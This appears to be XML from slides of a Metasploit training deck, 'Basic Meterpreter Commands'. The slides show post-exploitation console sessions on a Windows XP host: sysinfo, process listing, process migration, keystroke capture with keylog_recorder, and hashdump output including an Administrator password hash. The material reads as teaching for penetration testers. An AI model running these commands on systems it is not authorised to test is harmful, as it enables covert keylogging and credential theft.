          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3043234-9752-BCC9-D11A-6168A23634C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1598139" y="2284082"/>
            <a:ext cx="9448801" cy="769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ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D8B1E62-5FAE-21F7-EF94-B7A25A620188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805153" y="1930124"/>
            <a:ext cx="8172601" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Computer: IHAZSECURITY</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OS : P (Build 2600, Service Pack 2).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Arch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: x86Windows X</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E8AD44F-B7BF-7BEC-FC5D-123C1080D294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605481" y="3084719"/>
            <a:ext cx="2207977" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Process Number </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B14AFA84-0AB1-75EF-6D91-5976A08A0269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1598139" y="3659487"/>
            <a:ext cx="9461812" cy="2823257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8AF06EF-510F-471E-D82F-F830BB14317D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1820229" y="3659487"/>
            <a:ext cx="9422574" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Process list</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>============</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PID Name Arch Session User Path</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--- ---- ---- ------- ---- ----</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0 [System Process]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4 System x64 0 NT AUTHORITY\SYSTEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; migrate 2123</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300242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1386799" y="4422733"/>
            <a:ext cx="9461812" cy="2324055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE1924DE-6A5E-BD76-E761-2F018102EACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386799" y="3496011"/>
            <a:ext cx="9461812" cy="780356"/>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Basic Meterpreter Commands</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3073CE9-D070-BCD2-7F89-F6269D792881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367152" y="1053304"/>
            <a:ext cx="9461812" cy="1986458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A966C0-F1F0-C962-DA9A-7036684722F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617838" y="530084"/>
            <a:ext cx="2646878" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4. Capturing Keystrokes</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1C57C24-AD6B-6991-3D7F-1F85ADABAF4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365094" y="1054243"/>
            <a:ext cx="7830990" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run post/windows/capture/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylog_recorder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Executing module against hp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Starting the keystroke sniffer...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Keystrokes being saved in to /root/kali</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>232443556747874_default_192.168.1.1_hp11223.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{679466D3-8600-C0B1-3C77-B1A060A6337A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367152" y="2670430"/>
            <a:ext cx="10136989" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cat /root/.msf3/root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>23244355674787</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/_default_192.168.1.1_hp.key_11223.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A246210B-3C5C-FCBF-2333-F9A1431CA660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797142" y="3103013"/>
            <a:ext cx="2050561" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Password Hash</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB1EC9C-4CEA-9ABA-2F59-C1C743FEC8F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386799" y="3429000"/>
            <a:ext cx="8000908" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>password hashes form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	Administrator:500:e52cac67419a9a22cbb699e2fdfcc59e</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE6BB617-7523-F236-61A3-09E8F164188D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1586322" y="4629922"/>
            <a:ext cx="9698648" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Loading extension priv...success.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; run post/windows/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashdump</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Obtaining the boot key...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Calculating the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> key using SYSKEY 8528c78df7ff55040196a9b670f114b6...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Obtaining the user list and keys...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Decrypting user keys...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Dumping password hashes...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Administrator:500:aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29:::</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33822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1429687" y="3338797"/>
            <a:ext cx="9461812" cy="1555290"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3073CE9-D070-BCD2-7F89-F6269D792881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367152" y="1053304"/>
            <a:ext cx="9461812" cy="1774117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A966C0-F1F0-C962-DA9A-7036684722F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
